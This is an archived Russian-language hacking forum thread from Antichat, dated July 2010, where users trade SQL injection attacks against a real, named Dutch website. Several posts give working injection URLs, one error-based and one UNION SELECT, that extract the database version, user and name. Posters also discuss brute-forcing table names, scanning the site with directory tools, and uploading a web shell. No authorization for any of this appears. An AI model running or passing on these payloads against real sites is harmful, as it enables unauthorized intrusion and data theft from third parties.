ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.07.2010, 18:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от auth_root
auth_root said:
Konqi
огромное тебе спасибо! =) Плюс.
Только вопрос, админку не нашел? =) Если нашел или шелл залил, не мог бы скинуть в пм? Хотелось бы конечно увидеть пошагово, какие ты проводишь манипуляции с запросами при взломе. Но это будет наглеж с моей стороны отбирать твое время. Поэтому я изучаю статейку, хотелось бы все повторить на практике, вплоть до заливки шелла.
админку даже не искал, это уже не мое дело )
проскан сайт (IntelliTamper,DirBuster, ArxScanSite...)
|
|
|
22.07.2010, 18:57
|
|
Новичок
Регистрация: 01.02.2010
Сообщений: 12
Провел на форуме:
52455
Репутация:
18
|
|
Konqi
А доступа к системным таблицам нету, как я понимаю, или я не прав?
|
|
|
|
22.07.2010, 19:07
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Yetisports
http://banken.ruilen.nl/random.php?catid=473
Тут блайнд, 4-я ветка
database: admin_ruilen
|
|
|
|
22.07.2010, 19:10
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от auth_root
auth_root said:
Konqi
А доступа к системным таблицам нету, как я понимаю, или я не прав?
смотря на какой, нет доступа к Msysobjects, но есть доступ к Msysaccessobjects
а остальные(не дефолтные) таблицы нужно брутить
|
|
|
|
22.07.2010, 19:12
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от AKYLA
AKYLA said:
Yetisports
http://banken.ruilen.nl/random.php?catid=473
Тут блайнд, 4-я ветка
database: admin_ruilen
Зачем крутить как blind, если можно добиться вывода?
|
|
|
|
22.07.2010, 20:05
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
AKYLA
Код:
Code:
http://banken.ruilen.nl/random.php?catid=473+group+by+concat(version(),rand(0)|0)+having+avg(0)--+
ололо ) думаем ребята )
|
|
|
|
22.07.2010, 20:12
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596
Репутация:
88
|
|
Ну вообще да, можно вывести и так
Сообщение от None
http://banken.ruilen.nl/random.php?catid=473+UnIoN+SeLeCt+concat_ws%280x3a ,version%28%29,%20user%28%29,database%28%29%29--
|
|
|
|
22.07.2010, 20:15
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от AKYLA
AKYLA said:
Ну вообще да, можно вывести и так
Эм... А разница? /showpost.php?p=2262240&postcount=14459
Ах да, я нашёл в чем разница.
Твой способ обрезает часть версии.
|
|
|
|
22.07.2010, 20:22
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
Провел на форуме:
136979
Репутация:
53
|
|
Сообщение от mailbrush
mailbrush said:
Эм... А разница? /showpost.php?p=2262240&postcount=14459
Ах да, я нашёл в чем разница.
Твой способ обрезает часть версии.
Что где обрезанно? О_О что то я вас не понимаю молодой человек Раскрути ее своим запросом, вот тебе и разница
PS:Хотя спорить бесполезно каждый кулик свое болото хвалит.
|
|
|
|
22.07.2010, 21:24
|
|
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603
Репутация:
3
|
|
Объясните "что делает" эта запись rand(0)|0 ?? ну в смысле, для чего нужна вертикальная черта?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
